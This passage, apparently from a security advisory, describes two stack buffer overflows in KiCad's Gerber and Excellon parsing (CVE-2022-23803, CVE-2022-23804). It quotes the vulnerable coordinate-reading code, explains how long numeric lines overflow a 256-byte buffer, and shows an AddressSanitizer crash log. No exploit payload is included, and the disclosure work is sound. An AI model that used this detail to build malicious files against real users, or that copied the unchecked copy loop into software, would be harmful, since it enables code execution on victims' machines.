                    if( *text == &#39;*&#39; )      // command like X12550Y19250*
                    {
                        Execute_DCODE_Command( text, m_Last_Pen_Command );
                    }
                    break;
    
                case &#39;I&#39;:                                                     // [3]
                case &#39;J&#39;:       /* Auxiliary Move command */
                    m_IJPos = ReadIJCoord( text );
    
                    if( *text == &#39;*&#39; )      // command like X35142Y15945J504*
                    {
                        Execute_DCODE_Command( text, m_Last_Pen_Command );
                    }
                    break;
    

This method takes a gerber file path, opens it, and parses it line-by-line \[1\]. When a line starting with "X" or "Y" is encountered, the method GERBER_FILE_IMAGE::ReadXYCoord is called \[2\], whereas when the line starts with "I" or "J", the method GERBER_FILE_IMAGE::ReadIJCoord is called \[3\]. In both cases, the current line is passed as parameter. Both methods lead to the same issue; let's detail them individually.  
Also note that these same methods can be reached via an Excellon file in a similar way (via EXCELLON_IMAGE::LoadFile), as discussed below.

**CVE-2022-23803 - ReadXYCoord**

    VECTOR2I GERBER_FILE_IMAGE::ReadXYCoord( char*&amp; Text, bool aExcellonMode )
    {
        VECTOR2I pos;
        int      type_coord = 0, current_coord, nbdigits;
        bool     is_float   = false;
        char*    text;
        char     line[256];      // [4]
    
    
        if( m_Relative )
            pos.x = pos.y = 0;
        else
            pos = m_CurrentPos;
    
        if( Text == nullptr )
            return pos;
    
        text = line;
    
        while( *Text )
        {
            if( ( *Text == &#39;X&#39; ) || ( *Text == &#39;Y&#39; ) || ( *Text == &#39;A&#39; ) )
            {
                type_coord = *Text;
                Text++;
                text     = line;
                nbdigits = 0;
    
                while( IsNumber( *Text ) )   // [5]
                {
                    if( *Text == &#39;.&#39; )  // Force decimal format if reading a floating point number
                        is_float = true;
    
                    // count digits only (sign and decimal point are not counted)
                    if( (*Text &gt;= &#39;0&#39;) &amp;&amp; (*Text &lt;=&#39;9&#39;) )
                        nbdigits++;
    
                    *(text++) = *(Text++);    // [6]
                }
    
                *text = 0;
    
                ...
    
                continue;
            }
            else
            {
                break;
            }
        }
    
        if( m_Relative )
        {
            pos.x += m_CurrentPos.x;
            pos.y += m_CurrentPos.y;
        }
    
        m_CurrentPos = pos;
        return pos;
    }
    

At \[4\] a line buffer of size 256 bytes is allocated on the stack. Since the line started with "X" or "Y", the code reaches the while loop at \[5\], which expects a number inside the line. The loop stores the current character in the text buffer (that is, the line buffer) \[6\] and only stops when Text does not point to a number anymore.  
Because Text \[7\] is much larger than line and the loop does not check if \[6\] operates within the line's buffer bounds, the loop could write out of bounds if a large enough line containing numbers is supplied. This is a straightforward stack-based buffer overflow that could lead to code execution. Moreover, *text is assigned later in the same method, so corruption could occur slightly later too.

Allowed characters for IsNumber are the following:

    #define IsNumber( x ) ( ( ( (x) &gt;= &#39;0&#39; ) &amp;&amp; ( (x) &lt;=&#39;9&#39; ) )   \
                           || ( (x) == &#39;-&#39; ) || ( (x) == &#39;+&#39; )  || ( (x) == &#39;.&#39; ) )
    

Note that this method is also used while parsing an Excellon file. In that case, this same issue can be triggered via Execute_EXCELLON_G_Command or Execute_Drill_Command, both eventually calling ReadXYCoord.

**CVE-2022-23804 - ReadIJCoord**

    VECTOR2I GERBER_FILE_IMAGE::ReadIJCoord( char*&amp; Text )
    {
        VECTOR2I pos( 0, 0 );
    
        int     type_coord = 0, current_coord, nbdigits;
        bool    is_float   = false;
        char*   text;
        char    line[256];         // [4]
    
        if( Text == nullptr )
            return pos;
    
        text = line;
    
        while( *Text )
        {
            if( ( *Text == &#39;I&#39; ) || ( *Text == &#39;J&#39; ) )
            {
                type_coord = *Text;
                Text++;
                text     = line;
                nbdigits = 0;
    
                while( IsNumber( *Text ) )   // [5]
                {
                    if( *Text == &#39;.&#39; )
                        is_float = true;
    
                    // count digits only (sign and decimal point are not counted)
                    if( ( *Text &gt;= &#39;0&#39; ) &amp;&amp; ( *Text &lt;= &#39;9&#39; ) )
                        nbdigits++;
    
                    *(text++) = *(Text++);   // [6]
                }
    
                *text = 0;
    
                ...
    
                continue;
            }
            else
            {
                break;
            }
        }
    
        m_IJPos = pos;
        m_LastArcDataType = ARC_INFO_TYPE_CENTER;
        m_LastCoordIsIJPos = true;
    
        return pos;
    }
    

At \[4\] a line buffer of size 256 bytes is allocated on the stack. Since the line started with "I" or "J", the code reaches the while loop at \[5\], which expects a number inside the line. The loop stores the current character in the text buffer (that is, the line buffer) \[6\] and only stops when Text does not point to a number anymore.  
Because Text \[7\] is much larger than line and the loop does not check if \[6\] operates within the line's buffer bounds, the loop could write out of bounds if a large enough line containing numbers is supplied. This is a straightforward stack-based buffer overflow that could lead to code execution. Moreover, *text is assigned later in the same method, so corruption could occur slightly later too.

Allowed characters for IsNumber are the following:

    #define IsNumber( x ) ( ( ( (x) &gt;= &#39;0&#39; ) &amp;&amp; ( (x) &lt;=&#39;9&#39; ) )   \
                           || ( (x) == &#39;-&#39; ) || ( (x) == &#39;+&#39; )  || ( (x) == &#39;.&#39; ) )
    

Note that this method is also used while parsing an Excellon file. In that case, this same issue can be triggered via EXCELLON_IMAGE::LoadFile, Execute_EXCELLON_G_Command or Execute_Drill_Command, all eventually calling ReadIJCoord.

**Crash Information**

    ==1399==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffff8760 at pc 0x7fffed7dca70 bp 0x7fffffff85e0 sp 0x7fffffff85d0
    WRITE of size 1 at 0x7fffffff8760 thread T0
        #0 0x7fffed7dca6f in GERBER_FILE_IMAGE::ReadIJCoord(char*&amp;) src/kicad_1/gerbview/rs274_read_XY_and_IJ_coordinates.cpp:225
        #1 0x7fffed7da527 in GERBER_FILE_IMAGE::LoadGerberFile(wxString const&amp;) src/kicad_1/gerbview/readgerb.cpp:192
        #2 0x7fffed7d8e09 in GERBVIEW_FRAME::Read_GERBER_File(wxString const&amp;) src/kicad_1/gerbview/readgerb.cpp:58
        #3 0x7fffed783cd4 in GERBVIEW_FRAME::LoadListOfGerberAndDrillFiles(wxString const&amp;, wxArrayString const&amp;, std::vector&lt;int, std::allocator&lt;int&gt; &gt; const*) src/kicad_1/ger
    bview/files.cpp:293
        #4 0x7fffed780004 in GERBVIEW_FRAME::LoadGerberFiles(wxString const&amp;) src/kicad_1/gerbview/files.cpp:199
        #5 0x7fffed7acfb5 in GERBVIEW_FRAME::OpenProjectFiles(std::vector&lt;wxString, std::allocator&lt;wxString&gt; &gt; const&amp;, int) src/kicad_1/gerbview/gerbview_frame.cpp:273
        #6 0x55555561eae6 in PGM_SINGLE_TOP::OnPgmInit() src/kicad_1/common/single_top.cpp:428
        #7 0x555555625b0c in APP_SINGLE_TOP::OnInit() (gerbview+0xd1b0c)
        #8 0x5555556245c1 in wxAppConsoleBase::CallOnInit() (gerbview+0xd05c1)
        #9 0x7ffff6a38799 in wxEntry(int&amp;, wchar_t**) (/lib/x86_64-linux-gnu/libwx_baseu-3.0.so.0+0x113799)
        #10 0x55555561d75a in main src/kicad_1/common/single_top.cpp:269
        #11 0x7ffff509e0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #12 0x55555561d2ed in _start (gerbview+0xc92ed)
    
    Address 0x7fffffff8760 is located in stack of thread T0 at offset 288 in frame
        #0 0x7fffed7dc437 in GERBER_FILE_IMAGE::ReadIJCoord(char*&amp;) src/kicad_1/gerbview/rs274_read_XY_and_IJ_coordinates.cpp:194
    
      This frame has 1 object(s):
        [32, 288) &#39;line&#39; (line 200) &lt;== Memory access at offset 288 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow src/kicad_1/gerbview/rs274_read_XY_and_IJ_coordinates.cpp:225 in GERBER_FILE_IMAGE::ReadIJCoord(char*&amp;)
    Shadow bytes around the buggy address:
      0x10007fff7090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff70a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff70b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff70c0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
      0x10007fff70d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =&gt;0x10007fff70e0: 00 00 00 00 00 00 00 00 00 00 00 00[f3]f3 f3 f3
      0x10007fff70f0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7100: 00 00 00 00 f1 f1 f1 f1 00 00 00 f2 00 00 00 f2
      0x10007fff7110: 00 00 00 f2 f2 f2 00 00 00 00 00 f2 f2 f2 f2 f2
      0x10007fff7120: 00 00 00 00 00 f2 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8
      0x10007fff7130: f2 f2 f2 f2 00 00 00 00 00 00 f2 f2 f2 f2 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1399==ABORTING
    

**Timeline**

2022-02-02 - Vendor Disclosure

2022-02-16 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

Tag

#c++